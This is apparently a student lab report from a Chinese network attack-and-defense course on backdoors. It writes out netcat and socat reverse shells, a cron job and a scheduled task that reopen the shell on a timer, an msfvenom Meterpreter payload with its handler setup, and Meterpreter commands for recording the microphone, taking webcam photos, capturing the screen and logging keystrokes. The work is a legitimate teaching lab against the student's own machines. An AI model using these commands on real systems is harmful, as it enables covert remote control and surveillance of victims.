2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践
2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践
-
一、实验说明
-
任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
-
任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
-
任务三:使用MSF:meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
-
任务四:使用MSF:meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分))
-
实验准备
-
windows环境下下载老师提供的ncat和socat。
-
使用ipconfig(windows下)和ipconfig(kali下)查询主机与虚拟机的IP地址(因为我没有2台电脑)
-
知道了双方ip后,接下来就是使用ncat和socat这两个工具了,我们先用主机使用ncat.exe程序监听本机的5225端口:
-
接着在Kali环境下,使用
nc
指令反向连接Windows主机的5225端口: -
发现成功获得kali的shell
-
那么反过来呢,如何用kali获得主机的shell:
-
我们先在kali下使用nc指令监听5225端口
-
接着在主机下使用ncat.exe程序的-e选项项反向连接Kali主机的5225端口::
-
结果也成功了
-
我们如何使用nc传输数据呢?
-
windows下使用
ncat.exe -l 5225
监听5225端口 -
linux下使用
ncat 192.168.6.1 5225
链接(主机ip) -
很简单的就成功了
-
体验 MSF Meterpreter 功能
-
同样的,我们首先现在主机使用
ncat.exe -l -p 5225
启动监听5225端口 -
然后用
crontab -e
指令编辑一条定时任务,在最后一行添加13 * * * * /bin/netcat 192.168.6.1 5225 -e /bin/sh
,意思是在每个小时的第13分钟反向连接Windows主机的5225端口。 -
可见13分后,主机获得了kali的shell
-
同样的,反过来呢,让主机定时被kali获得shell:
-
首先,我们在任务计划程序创建任务,填写任务名称,并新建一个触发器。
-
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5225 exec:cmd.exe,pty,stderr
-
我们使用
windows + L
键重新进入电脑,发现任务进程中已有我们创好的触发器: -
此时,在Kali环境下输入指令
socat - tcp:192.168.6.1:5225
,13分时我们可以发现kali已可成功获得了一个cmd shell: -
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
-
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=5225 -f exe > 25test.exe
生成后门程序 -
通过
nc
指令将生成的后门程序传送到Windows主机上 -
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
msfconsole下依次输入:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.6.128
set LPORT 5225
show options
exploit
-
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容
-
使用
record_mic
指令可以截获一段音频: -
使用
webcam_snap
指令可以使用摄像头进行拍照: -
使用
screenshot
指令可以进行截屏: -
使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录: -
实验中遇到的问题及思考
-
问题:如图,计算机积极拒绝链接,一开始以为是防火墙的问题或者是ssh未打开,上网查了好多方法都没有用
-
解决方案:我打错了..少了端口号,加上就好了
-
实验总结及体会
-
本次实验我们简单了解和学习了一些后门工具的使用和如何通过他们来获得受害主机各种各样的权限;此次实验虽然内容简单,但我们对后门的基本原理了解却十分清晰,而且这次实验趣味性很强。
-
二、基础问题回答
-
问:例举你能想到的一个后门进入到你系统中的可能方式?
-
网上下载软件时、收邮件时、使用来历不明的u盘或者光盘时
-
问:例举你知道的后门如何启动起来(win及linux)的方式?
-
修改注册表、设置为开机自启动、诱导用户点击或者光标划过、可以设为定时启动、启动绑定软件时启动
-
问:Meterpreter有哪些给你映像深刻的功能?
-
它获取权限之后简直可以完全执行受害主机的所有功能..
-
问:如何发现自己有系统有没有被安装后门?
-
可以检测网络连接,查看是否有IP与本机建立连接;安装专门的杀毒软件查看,看注册表有没有多出奇怪的东西;看任务运行列表是否有奇怪的任务